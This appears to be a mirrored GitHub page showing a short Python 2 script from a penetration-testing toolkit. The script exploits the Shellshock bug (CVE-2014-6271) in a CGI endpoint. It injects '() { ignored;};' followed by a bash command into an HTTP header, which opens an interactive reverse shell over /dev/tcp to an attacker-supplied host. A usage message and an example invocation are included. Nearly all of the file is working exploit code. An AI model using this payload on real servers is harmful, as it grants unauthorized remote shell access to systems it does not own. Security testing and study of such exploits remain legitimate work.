mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-27 11:09:09 -04:00
21 lines
611 B
Python
21 lines
611 B
Python
#
|
|
#CVE-2014-6271 cgi-bin reverse shell
|
|
#
|
|
|
|
import httplib,urllib,sys
|
|
|
|
if (len(sys.argv)<4):
|
|
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
|
|
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
|
|
exit(0)
|
|
|
|
conn = httplib.HTTPConnection(sys.argv[1])
|
|
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
|
|
|
|
headers = {"Content-type": "application/x-www-form-urlencoded",
|
|
"test":reverse_shell }
|
|
conn.request("GET",sys.argv[2],headers=headers)
|
|
res = conn.getresponse()
|
|
print res.status, res.reason
|
|
data = res.read()
|
|
print data |